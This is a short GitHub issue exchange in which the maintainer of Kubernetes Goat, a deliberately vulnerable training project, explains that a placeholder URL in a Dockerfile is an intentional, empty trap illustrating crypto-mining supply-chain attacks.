madhuakula
commented
2 years ago Hi @adamhurm
Thank you so much for your kind words 🙌
Yes, great to see you are trying this on K3S 🥳 (I think currently the container images don't support ARM architecture believe). I am working on fixing this and releasing it in the coming week.
So regarding the https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 is just a trick/trap which is to showcase in the scenario saying that it's generally how in real-world attackers leveraged crypto mining and they build container images and push directly to docker hub without Dockerfile reference.
When people don't analyze them (basically the below layers) they are running some unknown code/scripts. So this is just intended and testing purpose only to showcase this example. There is no content in that URL/endpoint (I wish I can plant some backdoors 😉)
Thank you once again and let me know if you need any other help :)
Hi Madhu!
First off, thanks for creating this awesome project. I am currently trying to deploy it locally on my raspberry pi k3s cluster, so I was looking into the image files that were used.
When I checked some of the Dockerfiles, I noticed that infrastructure/batch-check/Dockerfile contains a reference to
https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1, which is currently getting a 404 response.Would you be able to look into this? Thanks!